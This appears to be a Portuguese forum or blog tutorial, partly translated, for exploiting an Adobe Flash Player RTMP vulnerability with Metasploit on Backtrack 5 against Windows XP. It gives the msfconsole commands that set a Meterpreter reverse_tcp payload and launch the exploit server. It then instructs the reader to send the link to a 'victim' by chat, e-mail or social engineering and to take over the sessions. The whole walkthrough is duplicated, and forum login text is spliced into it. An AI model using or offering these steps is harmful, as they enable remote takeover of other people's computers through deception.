Este módulo explora uma vulnerabilidade encontrada no Adobe Flash Player. Ao fornecer um corrupto AMF0 resposta "_error", é possível ganhar execução arbitrária de código remoto no contexto do usuário. Esta vulnerabilidade tem sido explorada na natureza como parte do "Congresso Mundial Uigur Invitation.doc" ataque e-mail. De acordo com a assessoria, 10.3.183.19 e 11.x antes 11.2.202.235 são afetados.
Exploit Metas
Adobe Flash Player 11.2.202.235
Internet Explorer 7 no XP SP2
Exigência
Atacante : Backtrack 5
Vítima PC : Windows XP
Abrir backtrack tipo de terminal msfconsole
![](https://3.bp.blogspot.com/-h10Y4ORSFvk/T-iyk7wiNCI/AAAAAAAADbg/2XhsYJhWu0M/s1600/1.jpg)
Agora digite use exploit/windows/browser/adobe_flash_rtmp
Msf exploit (adobe_flash_rtmp)>set payload windows/meterpreter/reverse_tcp
Msf exploit (adobe_flash_rtmp)>set lhost 192.168.1.2 (IP do Host Local)
Msf exploit (adobe_flash_rtmp)>set srvhost 192.168.1.2 (Este deve ser um endereço na máquina local)
Msf exploit (adobe_flash_rtmp)>set uripath / (O URL a utilizar para este exploit)
Msf exploit (adobe_flash_rtmp)>exploit
![](https://2.bp.blogspot.com/-WFEVpp2PvnM/T-iyvNralqI/AAAAAAAADbo/TV1m1utMBIQ/s1600/2.jpg)
Agora, uma URL que você deve dar a sua vítima Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
![](https://4.bp.blogspot.com/-C5tf313Vbio/T-iy2WPEvfI/AAAAAAAADbw/bQzBwePtCBQ/s1600/3.jpg)
Envie o link do servidor para a vítima através de chat ou e-mail ou qualquer técnica de engenharia social.
Agora você tem acesso ao PC vítimas. Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“
Exploit Metas
Adobe Flash Player 11.2.202.235
Internet Explorer 7 no XP SP2
Exigência
Atacante : Backtrack 5
Vítima PC : Windows XP
Abrir backtrack tipo de terminal msfconsole
![](https://3.bp.blogspot.com/-h10Y4ORSFvk/T-iyk7wiNCI/AAAAAAAADbg/2XhsYJhWu0M/s1600/1.jpg)
Agora digite use exploit/windows/browser/adobe_flash_rtmp
Msf exploit (adobe_flash_rtmp)>set payload windows/meterpreter/reverse_tcp
Msf exploit (adobe_flash_rtmp)>set lhost 192.168.1.2 (IP do Host Local)
Msf exploit (adobe_flash_rtmp)>set srvhost 192.168.1.2 (Este deve ser um endereço na máquina local)
Msf exploit (adobe_flash_rtmp)>set uripath / (O URL a utilizar para este exploit)
Msf exploit (adobe_flash_rtmp)>exploit
![](https://2.bp.blogspot.com/-WFEVpp2PvnM/T-iyvNralqI/AAAAAAAADbo/TV1m1utMBIQ/s1600/2.jpg)
Agora, uma URL que você deve dar a sua vítima Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
![](https://4.bp.blogspot.com/-C5tf313Vbio/T-iy2WPEvfI/AAAAAAAADbw/bQzBwePtCBQ/s1600/3.jpg)
Envie o link do servidor para a vítima através de chat ou e-mail ou qualquer técnica de engenharia social.
Agora você tem acesso ao PC vítimas. Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“
![](https://3.bp.blogspot.com/-oNBHE8mKVuY/T-iy_j5Q3HI/AAAAAAAADb4/akYBza36vJA/s1600/4.jpg)